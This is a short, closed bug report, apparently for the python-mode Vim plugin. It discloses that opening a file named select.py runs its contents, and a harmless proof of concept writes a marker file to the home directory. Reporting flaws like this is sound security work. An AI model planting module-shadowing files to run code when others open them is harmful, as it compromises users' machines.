Closed
Description
Hi,
It is possible to achieve arbitrary code execution when using python-mode.
➜ cat > select.py
import os
homedir = os.path.expanduser("~")
with open(os.path.join(homedir, "owned"), "w") as f:
    f.write("owned")
print "owned"
➜ vim select.py
owned
Press ENTER or type command to continue
➜ cat ~/owned
owned
➜ vim --version
VIM - Vi IMproved 7.3 (2010 Aug 15, compiled Oct 23 2012 18:42:18)
Included patches: 1-712
Compiled by ArchLinux
Care should be taken when opening source code from untrusted sources.
Regards,
Dhiru